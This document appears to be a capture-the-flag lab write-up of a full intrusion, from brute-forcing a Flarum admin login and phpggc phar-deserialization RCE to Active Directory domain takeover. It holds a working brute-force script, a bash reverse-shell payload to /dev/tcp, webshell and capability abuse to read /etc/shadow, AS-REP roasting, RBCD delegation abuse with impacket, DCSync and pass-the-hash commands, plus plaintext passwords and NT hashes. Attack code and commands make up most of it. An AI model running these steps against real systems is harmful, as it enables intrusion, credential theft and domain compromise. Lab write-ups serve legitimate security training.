Brute-force the admin panel password with rockyou.txt; the username is administrator. The script below replays the captured Flarum login request (headers, CSRF token and session cookie taken from that request) with each candidate password.

import requests

# Target URL and headers copied from the captured login request
url = "http://39.99.145.57/login"
headers = {
    "Host": "39.99.145.57",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Referer": "http://39.99.145.57/",
    "Content-Type": "application/json; charset=utf-8",
    # Flarum validates the CSRF token against the flarum_session cookie below,
    # so both must come from the same captured request
    "X-CSRF-Token": "BGMRkYNmoTorcp7Z7y0alTNUpBgAObn0ajWOCXjw",
    "Origin": "http://39.99.145.57",
    "Connection": "close",
    "Cookie": "flarum_session=HP5SjfzKojWBS5DalIA3k1x4i0o0CEwZWR2o6hfc",
    "Priority": "u=0"
}

# Path to the wordlist
password_file = "rockyou.txt"

# Base payload structure of Flarum's /login endpoint
base_payload = {
    "identification": "administrator",
    "password": "",
    "remember": False
}

def try_login(password):
    # Update payload with the current password
    payload = base_payload.copy()
    payload["password"] = password

    try:
        # Send POST request
        response = requests.post(url, headers=headers, json=payload, timeout=5)

        # On success Flarum answers 200 with {"token": ..., "userId": ...};
        # a wrong password gets a non-200 response carrying an "errors" array
        if response.status_code == 200 and "error" not in response.text.lower():
            print(f"Password: {password}")
            print(f"Status Code: {response.status_code}")
            print(f"Response: {response.text[:200]}...")
            return True
        return False

    except requests.exceptions.RequestException as e:
        print(f"Error with password {password}: {e}")
        return False

def main():
    try:
        # Read passwords from file; rockyou.txt contains lines that are not valid
        # UTF-8, so decode leniently instead of aborting on the first bad byte
        with open(password_file, 'r', encoding='utf-8', errors='ignore') as file:
            passwords = [line.strip() for line in file if line.strip()]

        print(f"Found {len(passwords)} passwords to try.")

        # Try each password; the for/else prints the failure message only when the loop
        # runs out of candidates without hitting break
        for password in passwords:
            if try_login(password):
                print(f"Success! Valid password found: {password}")
                break
        else:
            print("No valid password found.")

    except FileNotFoundError:
        print(f"Error: {password_file} not found.")
    except Exception as e:
        print(f"An unexpected error occurred: {e}")

if __name__ == "__main__":
    main()
'''
Found 14344382 passwords to try.
Password: 1chris
Status Code: 200
Response: {"token":"HMtVKZciPe3dCM549hF55R8MVPD83hMqB3dU6oCh","userId":1}...
Success! Valid password found: 1chris
'''

Once in the admin panel, a quick search shows this Flarum version has a known RCE, so generate the payload with phpggc. `-p tar` builds a tar-format phar archive and `-b` prints it base64-encoded; that base64 string is what replaces `xxx` in the data URI further down.

./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/ip/23333 0>&1'"

Paste it into Administration - Appearance - Custom Styles:

@import (inline) 'data:text/css;base64,xxx';

The inlined import is written verbatim into the compiled stylesheet, assets/forum.css. Now include that file through the phar:// wrapper from the same custom-styles field, which makes PHP parse the archive and unserialize its metadata:

.test {
    content: data-uri('phar://./assets/forum.css');
}

Shell received.

First drop a webshell so AntSword (蚁剑) can connect.

Privilege escalation via file capabilities

openssl carries a capability that lets it read arbitrary files (cap_dac_read_search skips the DAC read check), so it can be used to read any file on the box.
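The check behind this step is enumerating file capabilities and picking out the ones that give a file read or a root-equivalent foothold. The script below is an added example, not from the writeup: it parses `getcap -r /` output in both syntaxes libcap has used, flags dangerous capabilities, and builds the openssl read command the page relies on. `SAMPLE_GETCAP` is constructed sample output; `audit_live_system` only runs if a `getcap` binary is present.

```python
import shutil
import subprocess

# Capabilities that on their own give a file read or a path to root.
DANGEROUS_CAPS = {
    "cap_dac_read_search": "bypasses file read permission checks (arbitrary file read, e.g. openssl enc -in <file>)",
    "cap_dac_override": "bypasses file read/write/execute permission checks",
    "cap_setuid": "can switch to uid 0 and spawn a shell",
    "cap_setgid": "can switch to any gid",
    "cap_sys_admin": "mount and many other privileged operations",
    "cap_sys_ptrace": "can attach to and inject into root-owned processes",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses ownership checks on chmod and friends",
}

# Constructed sample of `getcap -r / 2>/dev/null` output covering both syntaxes:
# old libcap prints '/path = caps+ep', libcap >= 2.41 prints '/path caps=ep'.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_dac_read_search+ep
/usr/bin/python3.8 cap_setuid,cap_setgid=ep
"""


def parse_getcap(output: str) -> dict:
    """Map each path to the set of capability names it carries.

    Paths containing spaces are ambiguous in the new syntax and are not handled.
    """
    caps_by_path = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, capstr = line.split(" = ", 1)
        else:
            path, capstr = line.rsplit(None, 1)
        # drop the +ep / =ep flag suffix, keep the comma-separated names
        names = capstr.split("+", 1)[0].split("=", 1)[0]
        caps_by_path[path] = {n.strip().lower() for n in names.split(",") if n.strip()}
    return caps_by_path


def flag_dangerous(caps_by_path: dict) -> list:
    """Return (path, capability, why) for every capability listed in DANGEROUS_CAPS."""
    findings = []
    for path in sorted(caps_by_path):
        for cap in sorted(caps_by_path[path] & set(DANGEROUS_CAPS)):
            findings.append((path, cap, DANGEROUS_CAPS[cap]))
    return findings


def file_read_command(binary: str, target: str) -> list:
    """Argument vector that reads `target` through an openssl binary holding cap_dac_read_search."""
    return [binary, "enc", "-in", target]


def audit_live_system() -> list:
    """Run getcap on this host (empty result if getcap is missing) and flag what it reports."""
    if shutil.which("getcap") is None:
        return []
    proc = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, text=True)
    return flag_dangerous(parse_getcap(proc.stdout))


if __name__ == "__main__":
    for path, cap, why in flag_dangerous(parse_getcap(SAMPLE_GETCAP)) + audit_live_system():
        print(f"{path}: {cap} -> {why}")
    print(" ".join(file_read_command("/usr/bin/openssl", "/etc/shadow")))
```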

Scan the internal network

Set up frp for the pivot

Found a set of credentials in the database

Connect to the database

Found a large number of usernames (saved to users.txt for the next step)

AS-REP roasting against the collected usernames

proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile users.txt

Two accounts without Kerberos pre-authentication returned hashes

Crack the hashes (mode 18200 is Kerberos 5 AS-REP etype 23); one of them yields the plaintext

hashcat -a 0 -m 18200 --force hash.txt /usr/share/wordlists/rockyou.txt

RDP to 172.22.60.15; there is an Xshell install on it.

Extract the saved account credentials from it with a tool.

Collect domain information

proxychains4 bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

The user zhangxin is a member of the Account Operators group

FILESERVER has GetChanges and GetChangesAll on the domain, so it can perform a DCSync attack

RBCD attack

Add a machine account

proxychains4 impacket-addcomputer xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass '1q2w3e4r!'

Configure the attribute: write HACK$ into msDS-AllowedToActOnBehalfOfOtherIdentity on FILESERVER$

proxychains4 impacket-rbcd xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'FILESERVER$' -delegate-from 'HACK$'

Get a service ticket (ST) for cifs on FILESERVER impersonating Administrator

proxychains4 impacket-getST xiaorang.lab/'HACK$':'1q2w3e4r!' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

Edit /etc/hosts so that Fileserver.xiaorang.lab resolves

Pass the ticket and get the flag

export KRB5CCNAME=Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache
proxychains4 impacket-psexec Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8
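The step that makes the RBCD chain work is the `-action write` above: it stores a security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity on FILESERVER$ whose DACL grants HACK$ full control. The script below is an added example, not from the writeup or from impacket: it builds that self-relative descriptor byte for byte (20-byte header, 8-byte ACL header, one ACCESS_ALLOWED ACE per SID, the same 0xF01FF mask impacket's rbcd.py uses) and parses one back, which is the check a defender runs to see who is allowed to delegate to a computer. `HACK_SID` is a constructed SID; the real one is the objectSid the DC assigns after impacket-addcomputer. `write_rbcd_ldap3` shows the LDAP modify with the ldap3 library and assumes a bound connection; it is not executed here.

```python
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
FULL_CONTROL = 0x000F01FF  # 983551, the access mask impacket's rbcd.py writes


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1105' -> binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("bad SID: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> str:
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])


def build_rbcd_sd(allowed_sids) -> bytes:
    """Self-relative security descriptor: header (DACL at offset 20, no owner/group/SACL),
    ACL header, then one ACCESS_ALLOWED ACE with FULL_CONTROL per delegating SID."""
    allowed_sids = list(allowed_sids)
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = 8 + len(sid_bytes)  # AceType(1) AceFlags(1) AceSize(2) Mask(4) + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL) + sid_bytes
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def parse_rbcd_sd(blob: bytes) -> list:
    """Audit side: (SID, mask) for every ACCESS_ALLOWED ACE, i.e. every principal that may
    act on behalf of other identities against the computer this attribute belongs to."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((bytes_to_sid(blob[pos + 8:pos + ace_size]), mask))
        pos += ace_size
    return allowed


def write_rbcd_ldap3(conn, target_dn: str, blob: bytes) -> bool:
    """The modify impacket-rbcd -action write performs, with ldap3 (assumed installed; conn must be
    bound as a principal with write access to the target computer object, e.g. zhangxin)."""
    from ldap3 import MODIFY_REPLACE
    return conn.modify(target_dn, {"msDS-AllowedToActOnBehalfOfOtherIdentity": [(MODIFY_REPLACE, [blob])]})


# Constructed SID for HACK$; the real value is its objectSid after impacket-addcomputer.
HACK_SID = "S-1-5-21-1234567890-987654321-1122334455-1105"

if __name__ == "__main__":
    sd = build_rbcd_sd([HACK_SID])
    print(sd.hex())
    print(parse_rbcd_sd(sd))
```

Reading the attribute back with the same parser (`parse_rbcd_sd` on the raw value from LDAP) is the quickest way to confirm the write took, and to enumerate every computer in the domain that already has an entry, which is where a leftover HACK$ from an earlier engagement shows up.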


Dump FILESERVER's hashes with the same ticket

proxychains4 impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

Use the FILESERVER$ machine account's NT hash to DCSync the domain Administrator's hash

proxychains4 impacket-secretsdump xiaorang.lab/'FILESERVER$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator

Pass-the-hash for the remaining two flags

proxychains4 crackmapexec smb 172.22.60.8 -u administrator -H c3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag04.txt"

proxychains4 crackmapexec smb 172.22.60.15 -u administrator -H c3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag02.txt"